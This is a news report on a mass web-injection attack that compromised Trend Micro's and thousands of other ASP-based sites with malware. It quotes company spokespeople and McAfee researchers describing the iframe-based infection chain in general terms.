Trend Micro Victim Of Malicious Hack
Trend Micro spokesperson Mike Sweeny confirmed that several of Trend Micro's Web pages had been hacked, but said that the company had already taken corrective action to address the problem. "The pages have been fixed up and running for a couple of days now," said Sweeny. "Obviously, we're constantly hardening our sites."
"It's going to be a constant corrective action," Sweeny added. "It really shows the need for Web protection."
Trend Micro is currently investigating the Web attack. Sweeny said that so far analysis has shown that the redirect technology wasn't properly working. "If the redirect code would have worked, our Web threat protection would have blocked it," he said.
The security vendor's infected Web pages were part of a massive attack affecting more than 10,000 Web sites, which was first discovered Wednesday by researchers at McAfee Avert Labs. Attackers infected the otherwise trusted Web pages with password stealing loggers, backdoors and other types of malware on the PCs of users visiting the sites.
"The sites are .com (sites), .net (sites). Not necessarily names that people would have heard of, but also not really obscure, where people would look at the domain and say 'what's that about?" said Craig Schmugar, threat researcher for McAfee Avert Labs.
McAfee security experts said that the attack was revealed by following the chain of malicious code after the discovery of one compromised site, leading to more sites infected with the same malicious code.
"You follow the chain, one site leading to another. One executable download leads to another," said Schmuger.
Schmugar said that the infected pages all seem to use Microsoft's Active Server Page technology, which is used by many Web development programs to create HTML pages. The attack involved injecting a script into valid Web pages to include a reference to a malicious .JS file. The .JS file uses script to write an IFRAME, which loads a malicious HTML file that attempts to exploit several vulnerabilities in programs that use ActiveX controls such as RealPlayer, Baofeng Storm, Xunlei Thunder DapPlayer and Ourgame GLWorld Global Link Chat. Schmugar said that at least one of the payload Trojans targets online games.
Security experts say that this particular series of attacks is part of growing trend of malware threats that use legitimate Web sites to host malicious code and infect PCs unbeknownst to the users. Similar attacks have been observed in the past -- the most famous being last year's Superbowl attack on the Miami Dolphins Stadium Web site. That attack was later connected with SQL injection as the method attackers used to inject malicious code.
"The takeaway is, don't visit untrusted sites. But these sites or the users who frequent them are trusted. It's really about being skeptical about the content you visit," said Schmugar. "If you had kept software up to date, running desktop firewall, you would be protected from this attack."